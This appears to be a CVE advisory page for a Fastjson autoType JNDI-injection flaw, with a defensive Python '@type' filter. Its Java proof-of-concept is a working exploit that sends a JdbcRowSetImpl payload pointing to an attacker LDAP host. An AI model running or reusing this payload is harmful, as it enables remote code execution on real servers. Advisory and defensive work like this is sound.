Security Vulnerability Report
CVE-2025-70974 CVSS 10.0 CRITICAL

CVE-2025-70974

Published: 2026-01-09 07:16:03
Last Modified: 2026-04-15 00:35:42

Description

Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
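A defender-side pre-parse filter, added here as an example (it is not part of this report or of the Fastjson project): it rejects any inbound JSON body that carries the @type key named in the description, at any nesting depth, and fails closed on bodies Python cannot parse. Sample bodies and class names are constructed.

```python
"""Gateway/WAF-style check for fastjson @type keys in request bodies.

Added example, not the project's own code. Fastjson's parser is more
lenient than Python's json module (single quotes, unquoted keys), so a
body that json.loads rejects is blocked rather than passed through.
"""
import json
from typing import Any, Dict, List

AUTOTYPE_KEY = "@type"  # the key fastjson autoType reacts to


def find_autotype(node: Any, path: str = "$") -> List[str]:
    """Return JSONPath-like locations of every @type key, at any depth."""
    hits: List[str] = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}"
            if key == AUTOTYPE_KEY:
                hits.append(f"{here}={value!r}")
            hits.extend(find_autotype(value, here))  # keep walking
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_autotype(item, f"{path}[{i}]"))
    return hits


def check_body(raw: bytes) -> Dict[str, Any]:
    """Classify a body: allow, block (@type present) or block (not JSON)."""
    try:
        # json.loads resolves \u0040 escapes, so "\u0040type" is still caught
        doc = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return {"verdict": "block", "reason": "not valid JSON", "hits": []}
    hits = find_autotype(doc)
    if hits:
        return {"verdict": "block", "reason": "@type key present", "hits": hits}
    return {"verdict": "allow", "reason": "", "hits": []}


# Constructed sample bodies (hypothetical class names)
SAMPLES = {
    "benign": b'{"user": "alice", "roles": ["admin"]}',
    "top_level": b'{"@type": "example.SomeClass", "x": 1}',
    "nested": b'{"a": [{"b": {"@type": "example.Other"}}]}',
    "escaped": b'{"\\u0040type": "example.SomeClass"}',
    "broken": b'{"@type": ',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:10s} {check_body(body)}")
```

This is a compensating control only; the description places the fix in Fastjson 1.2.48 and notes later bypasses, so patching the library remains the primary action.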

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

alibaba/fastjson < 1.2.48
fastjson2 < 2.0.x (some versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
import java.io.BufferedReader;
import java.io.InputStreamReader;

public class fastjson_rce_poc {
    public static void main(String[] args) {
        try {
            // Target application endpoint and the attacker-controlled LDAP/RMI server
            String target = "http://target-server:8080/api";
            String jndiUrl = "ldap://attacker-server:1389/Exploit";
            // Malicious JSON payload with @type for JNDI injection
            String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\","
                    + "\"dataSourceName\":\"" + jndiUrl + "\","
                    + "\"autoCommit\":true}";
            System.out.println("[*] Sending malicious payload...");
            System.out.println("[*] Payload: " + payload);
            // Send the malicious JSON to the target
            java.net.HttpURLConnection conn = (java.net.HttpURLConnection) new java.net.URL(target)
                    .openConnection();
            conn.setRequestMethod("POST");
            conn.setRequestProperty("Content-Type", "application/json");
            conn.setDoOutput(true);
            conn.getOutputStream().write(payload.getBytes());
            BufferedReader reader = new BufferedReader(
                    new InputStreamReader(conn.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

References

https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
https://github.com/alibaba/fastjson/compare/1.2.47...1.2.48
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
https://www.cloudsek.com/blog/androxgh0st-continues-exploitation-operators-compromise-a-us-university-for-hosting-c2-logger
https://www.cnvd.org.cn/flaw/show/CNVD-2019-22238
https://www.freebuf.com/vuls/208339.html
https://www.seebug.org/vuldb/ssvid-98020

Weakness

CWE-829

Vulnerability Status

Deferred